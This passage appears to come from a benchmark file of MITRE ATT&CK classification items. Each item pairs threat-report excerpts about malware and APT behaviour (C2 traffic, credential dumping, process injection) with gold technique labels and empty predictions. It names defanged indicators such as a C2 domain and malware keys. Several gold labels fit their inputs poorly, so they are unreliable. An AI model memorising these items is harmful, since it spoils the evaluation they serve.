For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.\n\t - T1568: Dynamic Resolution\n- Text: From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently. Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell\n\t - T1568.001: Dynamic Resolution - Fast Flux DNS\n- Text: APT39 has used remote access tools that leverage DNS in communications with C2.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nFor instance, when using this string we observed DNS queries for \u201capple-search.infoclose\u201d, as the string \u201cclose\u201d was supposed to be the next portion of the C2 URL", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n\t - T1114.002: Email Collection - Remote Email Collection\n\t - T1078: Valid Accounts\n- Text: AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.\n\t - T1114: Email Collection\n\t - T1587.001: Develop Capabilities - Malware\n- Text: IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers\n\t - T1087.003: Account Discovery - Email Account\n", "input": "\nused a tool called MailSniper to search through the Exchange server mailboxes for keywords.", "gold": "- T1114: Email Collection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses a module to execute Mimikatz with PowerShell to perform .\n\t - T1064: Scripting\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: MechaFlounder has the ability to upload and download files to and from a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nUse of PowerShell to download additional tools", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent Tesla can collect account information from the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: The paths discovered are: \u2022 C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based\n\t - T1033: System Owner/User Discovery\n\t - T1005: Data from Local System\n\t - T1087: Account Discovery\n\t - T1204: User Execution\n- Text: Agent.btz obtains the victim username and saves it to a file.\n\t - T1033: System Owner/User Discovery\n", "input": "\ncollects information on local user accounts from the victim.", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SPACESHIP copies staged data to removable drives when they are inserted into the system.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n- Text: copies staged data to removable drives when they are inserted into the system.\n\t - T1052: Exfiltration Over Physical Medium\n- Text: The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution\n\t - T1091: Replication Through Removable Media\n", "input": "\ncontains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.", "gold": "- T1052: Exfiltration Over Physical Medium", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OopsIE compresses collected files with GZipStream before sending them to its C2 server.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1049: System Network Connections Discovery\n- Text: Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.\n\t - T1560: Archive Collected Data\n", "input": "\nAn example of 1.hwp with registry and system information: Gold Dragon executes these steps executed in the exfiltration process: Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password \u201cwww[dot]GoldDragon[dot]com\u201d The encrypted content is written to the data file 1.hwp", "gold": "- T1074: Data Staged\n- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once a file is uploaded, Machete will delete it from the machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: It writes a file using two data structures: one associated with the file and other used for reading data from the C&C\n\t - T1070: Indicator Removal\n- Text: Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid\n\t - T1485: Data Destruction\n", "input": "\nactors deleted tools and batch files from victim systems.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process\n\t - T1055: Process Injection\n\t - T1059: Command and Scripting Interpreter\n- Text: The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: \u00a0 SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers\n\t - T1064: Scripting\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Taidoor can perform DLL loading.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\nThe encoded payload was a Cobalt Strike httpsstager that was injected into the PowerShell process that ran the command", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077.\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n- Text: Sandworm Team's research of potential victim organizations included the identification and collection of employee information.\n\t - T1589.003: Gather Victim Identity Information - Employee Names\n- Text: The \"net user username \\password \\domain\" commands in Net can be used to create a domain account.\n\t - T1136.002: Create Account - Domain Account\n", "input": "\nRussia Ukraine Poland Lithuania Belarus Azerbaijan Kyrgyzstan Kazakhstan Iran Israel Turkey Libya Kuwait Taiwan Vietnam India Croatia Germany Belgium Sweden Victim profiles point to an expansive interest in ICS: power generation site owners power facilities construction power generation operators large suppliers and manufacturers of heavy power related materials investors However, we also noticed that\u00a0the target list includes government, property holding, and technology organizations as well: high level government other ICS construction federal land holding agencies municipal offices federal emergency services space and earth measurement and assessment labs national standards body banks high-tech\u00a0transportation academic research Victim cases We gained insight into significant BE2 victim profiles over the summer of 2014", "gold": "- T1007: System Service Discovery\n- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: QakBot has gained execution through users opening malicious attachments.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nused spearphishing with Microsoft Office attachments to target victims.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HotCroissant has the ability to download files from the infected host to the command and control (C2) server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: h) It also uses \u201cActiveXObject\u201d utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: Shamoon has used HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nWe have seen the following HTTP POST parameters within the Zebrocy C++ samples: porg structOne oq volume DDE Details The author of the DDE document used in the February 2018 attacks used some obfuscation techniques in an attempt to evade detection", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1105: Ingress Tool Transfer\n\t - T1083: File and Directory Discovery\n- Text: There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\ncan download and execute a file from given URL.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Avenger has the ability to use Tasklist to identify running processes.\n\t - T1057: Process Discovery\n- Text: Ke3chang performs service discovery using \"net start\" commands.\n\t - T1007: System Service Discovery\n- Text: contains a command to collect information about anti-virus software on the victim.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nlists the running processes on the system.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 used GetPassword_x64 to harvest credentials.\n\t - T1003: OS Credential Dumping\n- Text: MuddyWater has performed credential dumping with LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n- Text: Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google\u00a0Chrome browser. Figures 7\u00a0and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\ncollects user credentials, including passwords, for various programs and browsers, including popular instant messaging applications, Web browsers, and email clients. Windows account hashes, domain accounts, and LSA secrets are also collected, as are WLAN keys.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RATANKBA uses cmd.exe to execute commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Figure 1: SpeakUp\u2019s Victim Distribution Figure 2: SpeakUp\u2019s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor\n\t - T1059: Command and Scripting Interpreter\n- Text: The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", "input": "\ncan create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.Infection VectorsThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office\n\t - T1203: Exploitation for Client Execution\n- Text: Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence\n\t - T1190: Exploit Public-Facing Application\n- Text: Hildegard has used the BOtB tool which exploits CVE-2019-5736.\n\t - T1068: Exploitation for Privilege Escalation\n", "input": "\nBuckeye has been known to exploit zero-day vulnerabilities in the past, such as CVE-2010-3962 in an campaign in 2010 and CVE-2014-1776 in 2014", "gold": "- T1068: Exploitation for Privilege Escalation\n- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Andariel has limited its watering hole attacks to specific IP address ranges.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n- Text: APT1 has registered hundreds of domains for use in operations.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.\n\t - T1590.001: Gather Victim Network Information - Domain Properties\n", "input": "\nAnalysis of the domains and IP address infrastructure used by APT15 identified a number of similar possible domains, shown at the bottom of the post", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution.\n\t - T1083: File and Directory Discovery\n- Text: Stealth Falcon malware gathers data from the local victim system.\n\t - T1005: Data from Local System\n- Text: BADNEWS copies files with certain extensions from USB devices to\na predefined directory.\n\t - T1025: Data from Removable Media\n", "input": "\nCommand Description search Searches for corresponding files search&upload Encrypts and adds the corresponding files to the upload directory with the provided name uploadfile Encrypts and adds the specified file to the upload directory with the provided name uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name shellexecute Silently executes received command with cmd.exe wmic Silently executes received command with wmic.exe (for WMI commands) sendIEPass Encrypts and adds all gathered browser data into files for upload to C2 uninstall Removes files, directory and BITS tasks Cryptography To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every sample", "gold": "- T1047: Windows Management Instrumentation\n- T1070.006: Indicator Removal - Timestomp\n- T1036: Masquerading\n- T1083: File and Directory Discovery\n- T1074: Data Staged\n- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba can enumerate local drives, disk type, and disk free space.\n\t - T1082: System Information Discovery\n- Text: BLUELIGHT has exfiltrated data over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\ninfoClient is reponsible for collecting OS info, submitting this info to its C&C servers (the servers are malicious in nature), and receiving additional C&C communication information", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.\n\t - T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting\n- Text: BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nThese requests are encrypted using the RC4 algorithm", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kessel has exfiltrated information gathered from the infected system to the C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Pony has sent collected information to the C2 via HTTP POST request.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", "input": "\nOnce encrypted, the system information is sent in the body of an HTTP POST", "gold": "- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The\u00a0NetWire\u00a0payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were\u00a0the same\n\t - T1105: Ingress Tool Transfer\n- Text: EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nmalware can use PowerShell commands to download and execute a payload and open a decoy document on the victim\u2019s machine.", "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2.\n\t - T1560: Archive Collected Data\n- Text: copies files from removable drives to C:\\system.\n\t - T1074: Data Staged\n", "input": "\nadds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.", "gold": "- T1560: Archive Collected Data\n- T1486: Data Encrypted for Impact\n- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n- Text: Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here\n\t - T1055.002: Process Injection - Portable Executable Injection\n", "input": "\nAfter finding the process id, the shellcode uses standard functions to allocate and write memory within Explorer and then uses low-level API RtlCreateUserThread for thread injection.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has used multiple proxies to obfuscate network traffic from victims.\n\t - T1090.002: Proxy - External Proxy\n- Text: 